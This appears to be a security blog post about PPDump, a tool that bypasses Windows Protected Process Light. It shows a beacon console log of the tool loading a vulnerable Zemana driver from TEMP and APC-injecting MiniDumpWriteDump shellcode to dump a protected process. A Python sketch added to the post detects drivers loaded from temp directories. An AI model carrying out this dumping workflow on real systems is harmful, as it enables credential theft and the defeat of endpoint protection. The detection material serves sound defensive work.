PPDump bypasses Protected Process Light

March 27, 2020

Bypassing Antimalware Protected Process Light

    beacon> ppdump 820
    [ ] driver will be stored in C:\WINDOWS\TEMP\tiGr4.sys
    [ ] minidump will be stored in C:\WINDOWS\TEMP\usaxb.dmp
    [+] Wrote 232792 to C:\WINDOWS\TEMP\tiGr4.sys successfully
    [ ] attemping to load C:\WINDOWS\TEMP\tiGr4.sys with service control manager
    [ ] registered service tiGr4.sys successfully
    [ ] started service tiGr4.sys successfully
    [+] LoadDriver() successfully loaded the driver
    [ ] Calling ZemanaRegisterProcess() to add 3616
    [ ] Opening target process -> 820
    
     ======= ENTER THE DANGER ZONE =======
    [ ] MiniDumpWriteDump Shellcode is 1025 bytes
    [ ] Attemping to APC Bomb All Threads
    [+] apc successfully queued for 836
    [+] apc successfully queued for 848
    [+] apc successfully queued for 852
    [+] apc successfully queued for 864
    [+] apc successfully queued for 3456
    [+] apc successfully queued for 4044
    [+] apc successfully queued for 344
     ======= LEAVE THE DANGER ZONE =======
    
    [ ] deleted service tiGr4.sys successfully
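From a defender's side, the log above carries the sequence worth alerting on: a `.sys` file is written to `C:\WINDOWS\TEMP`, registered and started as a kernel-mode service through the service control manager, used, and then the service is deleted. The example below is an added detection sketch, not part of the original post or the PPDump tool: it triages constructed records modelled on Windows System event 7045 (service installed) and Sysmon event 6 (driver loaded) and flags kernel drivers installed from, or loaded out of, temp directories; field names are simplified assumptions.

```python
import re

# Constructed sample records (not real captures). Shapes loosely follow
# System event 7045 "A service was installed in the system" and Sysmon
# event 6 "Driver loaded"; field names are simplified for the example.
SAMPLE_EVENTS = [
    {"id": 7045, "ServiceName": "tiGr4.sys", "ServiceType": "kernel mode driver",
     "ImagePath": r"C:\WINDOWS\TEMP\tiGr4.sys"},
    {"id": 7045, "ServiceName": "Spooler", "ServiceType": "user mode service",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"id": 6, "ImageLoaded": r"C:\WINDOWS\TEMP\tiGr4.sys"},
    {"id": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},
]

# Directories a legitimate driver package essentially never lives in:
# the system TEMP directory, a per-user TEMP, or a bare <drive>:\temp.
TEMP_DIR_RE = re.compile(
    r"^[A-Z]:\\(windows\\temp|users\\[^\\]+\\appdata\\local\\temp|temp)\\",
    re.IGNORECASE,
)


def is_suspicious_driver_path(path: str) -> bool:
    """True when a kernel driver image sits under a temp directory."""
    return path.lower().endswith(".sys") and bool(TEMP_DIR_RE.match(path))


def triage(events):
    """Return (source, service_name, path) for every driver install or
    load whose image path is suspicious. Service installs are only
    considered when the service type is a kernel-mode driver; Sysmon 6
    records are always driver loads."""
    findings = []
    for ev in events:
        if ev["id"] == 7045 and "driver" in ev.get("ServiceType", "").lower():
            path = ev["ImagePath"]
            if is_suspicious_driver_path(path):
                findings.append(("system-7045", ev["ServiceName"], path))
        elif ev["id"] == 6:
            path = ev["ImageLoaded"]
            if is_suspicious_driver_path(path):
                findings.append(("sysmon-6", None, path))
    return findings


if __name__ == "__main__":
    for source, name, path in triage(SAMPLE_EVENTS):
        print(f"{source}: service={name} image={path}")
```

Pairing a hit from 7045 with a Sysmon 6 load of the same path within a short window, and with a later removal of that service's registry key, gives a higher-confidence signal than either record alone.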